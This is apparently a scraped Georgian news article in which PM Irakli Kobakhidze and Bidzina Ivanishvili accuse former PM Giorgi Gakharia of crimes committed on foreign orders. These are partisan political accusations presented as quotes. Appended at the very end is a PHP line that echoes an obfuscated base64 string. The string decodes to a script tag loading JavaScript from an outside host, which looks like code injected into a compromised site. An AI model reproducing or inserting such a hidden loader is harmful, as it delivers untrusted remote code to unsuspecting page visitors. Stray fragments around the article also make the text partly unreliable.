celsiusi
ავერსი შნაიდერი

გიორგი გახარიასთვის ეპითეტი „გარეწარიც“ კი ძალიან რბილი შეფასებაა - ის გარე დავალებების საფუძველზე, უმძიმეს დანაშაულებს ჩადიოდა, - ამის შესახებ პრემიერ-მინისტრმა, ირაკლი კობახიძემ ჟურნალისტებთან განაცხადა.

მისივე თქმით, ქვეყნის ყოფილი პრემიერ-მინისტრი და პარტია „გახარია საქართველოსთვის“ ლიდერი, გიორგი გახარია ერთმანეთს შეგნებულად უპირისპირებდა სახელმწიფოს და ადამიანებს, სამართალდამცველებს და ახალგაზრდებს.

„პრინციპში, ხელის გულზე დევს მისი ძირითადი დანაშაულები. კიდევ ერთხელ შემიძლია ჩამოვთვალო რამდენიმე მთავარი დანაშაული, რაც მან ჩაიდინა. ეს იყო მესტიის სპეცოპერაცია, სადაც მის მიერ დაგეგმილი სპეცოპერაციის გამო, რეალურად, შეურაცხყოფილი დატოვა სპეცრაზმის წარმომადგენლები, ჩვენი პოლიციელები. მეორე იყო პანკისი, სადაც მოხდა ზუსტად იგივე. მესამე იყო ბასიანის სპეცოპერაცია. გახსოვთ, როგორ წარიმართა ეს მოვლენები. გახარია შეგნებულად უპირისპირებდა ერთმანეთს სახელმწიფოს და ადამიანებს, სამართალდამცველებს და ახალგაზრდებს. ამას აკეთებდა ის სპეციალურად, შეგნებულად, გარე დავალებების საფუძველზე. რაც მან 20 ივნისს გააკეთა, როდესაც წყლის ჭავლი და გაზი არ გამოიყენა და მიიყვანა საქმე იქამდე, სადამდეც მიიყვანა, არის მისი ერთ-ერთი უმთავრესი უმძიმესი დანაშაული. მისი დანაშაული იყო ასევე ჩორჩანა. თითოეულ შემთხვევაში, ის ცდილობდა გარე დავალებების საფუძველზე დაეზიანებინა სახელმწიფოს ინტერესები, დაეპირისპირებინა ერთმანეთისთვის სამართალდამცველები და ახალგაზრდები, ზოგადად, სახელმწიფო და ადამიანები. ეს არის უმძიმესი დანაშაულები, რომლებსაც გახარია ჩადიოდა სწორედ დავალებების საფუძველზე. აქედან გამომიდინარე მისთვის ეპითეტი „გარეწარიც“ კი არის ძალიან რბილი შეფასება,“ - განაცხადა კობახიძემ.

ცნობისთვის, გიორგი გახარიას „გარეწარი“ „ქართული ოცნების“ საპატიო თავმჯდომარემ, ბიძინა ივანიშვილმაც უწოდა. როგორც ბიძინა ივანიშვილმა აღნიშნა, „გახარია საქართველოსთვის“ წევრები „ნაციონალური მოძრაობის“ ნარატივს ერთი-ერთზე იმეორებენ და უარესსაც, რის გამოც "მკაცრ სასჯელს იმსახურებენ".

„არასდროს შეურაცხყოფა არ მიმიყენებია პოლიტიკოსისთვის, მაგრამ ამ გარეწართან [გიორგი გახარია], ამასთან რომ დგანან, ამის გვერდით, რა თქმა უნდა, მათ გასამართლება მოუწევთ,“ - განაცხადა ივანიშვილმა.მისივე თქმით, გიორგი გახარიას გადადგომა, 2021 წელს სწორედ საქართველოს ომში ჩართვისთვის მომზადებას უკავშირდებოდა, ვინაიდან, იცოდნენ, რომ „ქართული ოცნება“ არ იომებდა და მმართველი გუნდის ჩამოშლა ჰქონდათ განზრახული, რამაც შედეგი ვერ გამოიღო.

85
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");